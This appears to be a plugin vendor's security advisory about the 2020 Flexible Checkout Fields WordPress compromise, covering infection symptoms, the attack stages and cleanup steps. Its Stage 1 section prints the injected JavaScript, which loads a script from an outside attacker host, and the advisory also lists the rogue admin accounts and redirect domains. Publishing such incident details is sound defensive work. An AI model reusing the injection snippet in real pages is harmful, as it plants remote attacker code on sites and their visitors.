We have discovered the Flexible Checkout Fields free vulnerability. Fortunately, the source of the security breach was quickly identified and we developed a 2.3.4 update fix. Read this article to find out how to proceed in case of an infection and how to make sure your store is safe.
Today we have been notified about a possible security breach related to an indirect use of our Flexible Checkout Fields free plugin available in the WordPress repository. The data we have gathered brought us to a conclusion that apparently it was used by another separate plugin working in the background which had been creating additional admin accounts.
With the help of the WordPress community, we quickly identified the source of the problem and developed the appropriate vulnerability fix within less than an hour. The situation is now fully under control and Flexible Checkout Fields free plugin is no longer a threat. The 2.3.4 update we have just released prevents the reuse of the above described security breach method.
Site infection symptoms:
- the appearance of new admin accounts that weren't created yourself
- the appearance of new plugins on the plugins list that weren't personally installed
- suspicious files, especially the ones with .php or .zip extensions e.g. Woo-Add-To-Carts.zip were placed in /wp-content/uploads/ directory
- rearrangement of the checkout fields, their unusual faulty functioning or appearance of the new fields that hadn't be previously added.
- automatic redirections after moving to the checkout
Even if you haven't noticed any suspicious activity on your website it's highly advised to take additional measures to eliminate the possible effects of the forementioned vulnerability and restore the appropriate level of security. Update the free version of Flexible Checkout Fields plugin at least to the 2.3.4 version or higher and follow the instructions below to make sure your shop hasn't been infected.
Update #2 (8:00 PM)
We have just released the 2.3.4 update which prevents the infection from spreading if stage 1 is already on. Learn more how the infection works →
- Update the plugin before taking any further actions!
- After the Flexible Checkout Fields free is updated to its 2.3.4 release go to the plugin settings (WooCommerce → Checkout Fields) and check if any new fields appeared there. If so, delete them.
- Please also make sure that the infection at your shop hasn't already reached stage 2 - the additional admin accounts haven't been created and Woo-Add-To-Carts plugin installed.
Update #1 (4:50 PM)
We have figured out how the infection exactly works. Having known this, we will be able to prepare a plugin update which will prevent the attack from going further even if it has reached stage 1.
How does the infection work?
Stage 1
Exploiting the vulnerability the two custom fields are being added in the two different sections e.g. Billing and Shipping. After they have been created the following script is about to be injected in two different ways:
var script_tag = document.createElement ('script');
script_tag.setAttribute ( 'src' 'https: //umbriawalking.com/counter/pixel.js');
document.head.appendChild (script_tag); "
If succeeded, it allows the infection to enter stage 2.
Stage 2
To complete the procedure the site admin has to visit the plugin configuration screen (WooCommerce → Checkout Fields) or the checkout page.
Then the following admin accounts are being created:
wptest_dev1: wptest_dev2@yahoom.com
wptest_dev2: wptest_dev1@yahoom.com
woo_developdevacc: woo_developdevacc@yahoom.com
developer_test_user: developer_test_user@example.com
The Woo-Add-To-Carts.zip file is being downloaded thereafter, placed in /wp-content/uploads/2020/02/ directory and then being installed using WordPress default mechanisms which in turn results in extracting its .php files to /wp-content/plugins/Woo-Add-To-Carts/. After that it is visible on the installed plugins list and is treated as a standard WordPress plugin called Woo-Add-To-Carts.
In some cases you can also experience the automatic redirections to URLs such as collectfasttracks(dot)com after moving to the checkout or even already on the homepage.
If you notice any of the symptoms which fit the above description, it is highly probable your site has been infected. Please proceed according to the following instructions:
What to do if your WooCommerce site has been infected?
- Update the Flexible Checkout Fields free plugin to at least its 2.3.4 release
- Delete all the unnecessary admin accounts especially these below:
wptest_dev1: wptest_dev2@yahoom.com
wptest_dev2: wptest_dev1@yahoom.com
woo_developdevacc: woo_developdevacc@yahoom.com
developer_test_user: developer_test_user@example.com - Make sure that no unknown admin account have been added. If so, delete them as well.
- Delete the Woo-Add-To-Carts.zip file from /wp-content/uploads/2020/02/ directory
- Verify if there are any suspicious files at /wp-content/uploads/ directory.
- Delete the Woo-Add-To-Carts plugin from the installed plugin list and /wp-content/plugins/Woo-Add-To-Carts/ folder if it still exists
- Make sure there are no unidentified plugins on the list that you personally have not installed
- Check if any new fields have appeared on the plugin configuration screen (WooCommerce → Checkout Fields). If so, delete them. Please also check the already existing ones if they haven't been modified in any matter.
- If the admin accounts are still being added reset the Flexible Checkout Fields settings to default in every fields’ section in accordance with the instructions below.
- If you are still being redirected after hitting the homepage or moving to the checkout please check if there is a malicious code added in the header.php file of the theme you are currently using (/wp-content/themes/name-of-your-theme/header.php). If you find it, delete it, save the changes and upload the modified file back to the FTP.
It is usually placed right at the beginning of the header.php file and looks this way or similar:
Following all the above steps is sufficient to eliminate the source of the infection, however, in order to ensure even higher security you may take the beneath enlisted precautions.
If you have a backup of the site's files:
- Restore all of the site's files from the backup created before the problem occurred, making sure that all the potentially infected files were deleted.
- Update the Flexible Checkout Fields free plugin to at least its 2.3.4 release
- Restore the database from the backup (Please mind that some orders data might be lost).
- Make sure you have followed all the neccessery steps and deleted all the above listed files/directories.
If you do not have a backup of the site's database or if you are unsure whether the additional fields have appeared:
- Reset the Flexible Checkout Fields settings to default in every fields’ section. To achieve that go to WooCommerce → Checkout Fields and hit the Reset Section Settings link there for each section. You can also reach it typing the following URL:
/wp-admin/admin.php?page=inspire_checkout_fields_settings - Reset Section Settings for the Billing section:
/wp-admin/admin.php?page=inspire_checkout_fields_settings&tab=fields_billing - Reset Section Settings for the Shipping section:
/wp-admin/admin.php?page=inspire_checkout_fields_settings&tab=fields_shipping - Reset Section Settings for the Order section:
/wp-admin/admin.php?page=inspire_checkout_fields_settings&tab=fields_order - Delete all the unnecessary admin accounts including the ones created due to the infection
- Delete all the suspicious plugins you haven't installed before, especially Woo-Add-To-Cart plugin.
- Check if the header.php file of the theme you are currently using contains the malicious code
If you have followed all the instructions above and still have problems on your site, please contact us directly at help@wpdesk.net and provide us with as much detailed information as possible including:
- Problem description with the information about what exactly happened with your site.
- The list of installed plugins and their versions (WooCommerce system status)
